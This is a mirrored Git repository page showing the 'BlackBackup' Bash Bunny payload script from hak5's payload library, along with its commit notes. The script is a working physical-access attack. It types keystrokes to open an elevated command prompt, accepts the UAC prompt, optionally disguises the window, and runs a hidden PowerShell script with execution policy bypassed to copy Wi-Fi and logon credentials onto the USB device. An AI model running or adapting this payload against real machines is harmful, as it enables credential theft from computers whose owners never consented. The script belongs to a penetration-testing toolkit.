hak5/bashbunny-payloads
1
0
Fork 0
mirror of https://github.com/hak5/bashbunny-payloads.git synced 2025-10-29 16:58:25 +00:00
Code Issues Packages Projects Releases Wiki Activity
Files
4e2593beb425eec0a38509ed563bbdbbf64df2c3
bashbunny-payloads/payloads/library/exfiltration/BlackBackup/payload.txt
Aidan Holland 5a77792c1d Update and fix payloads (#277) 
* Updated all Payloads for Version 1.2+

Fixed Style Issues on extensions and payloads.
Added GET TARGET_OS to get.sh
Removed and Fixed all uses ducky_helper.sh (Issue #248)
Removed all mention of DUCKY_LANG (Issue #248)
Renamed Payloads with spaces in name
Added an extension to keep Macs Happy
Added a payload for Mac DNS poisoning
Fixed Issue #271 changed wget to curl -o
Implemented PR #268
Implemented PR #273

* Fixed e.cmd

* Fix e.cmd pt2

* Fixed Issues

Fixed issues pointed out by @sebkinne
Fixed styling errors
2017-10-25 11:10:17 +11:00

60 lines
1.4 KiB
Plaintext
Raw Blame History

# Title: BlackBackup
# Author: JWHeuver & JBaselier
# Version: 1.0
#
# Runs powershell script to get Wlan and logon credentials
# from computer and save them on USB drive (Storage attack)
#
# Purple.............Loading
# Green .............Execute Credential Ripper Powershell
# Off................Finished
#
#!/bin/bash
# OPTIONS - More options available in the Powershell payload
OBFUSCATECMD="N" # Y=yes or N=no
#-----------------------------------
# Purple LED - initializing
LED SETUP
GET SWITCH_POSITION
# Attackmode HID / Storage
ATTACKMODE HID STORAGE
#-----------------------------------
# Green LED - executing credential_powershell
LED STAGE1
QUACK GUI r
QUACK DELAY 300
QUACK STRING powershell Start-Process cmd -Verb runAs
QUACK ENTER
QUACK DELAY 4000
QUACK ALT y
QUACK ALT j
QUACK ENTER
QUACK DELAY 1000
# Obfuscate CMD?
if [ $OBFUSCATECMD == "Y" ]; then
QUACK STRING mode con:cols=20 lines=1
QUACK ENTER
QUACK DELAY 100
QUACK STRING color FE
QUACK ENTER
QUACK DELAY 100
fi
# Execute Attack
QUACK STRING powerShell -windowstyle hidden -ExecutionPolicy Bypass ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\credentials.ps1')"
QUACK ENTER
QUACK DELAY 1000
QUACK STRING exit
QUACK ENTER
#-----------------------------------
# Kill the lights - finished
LED FINISH
Reference in New Issue View Git Blame Copy Permalink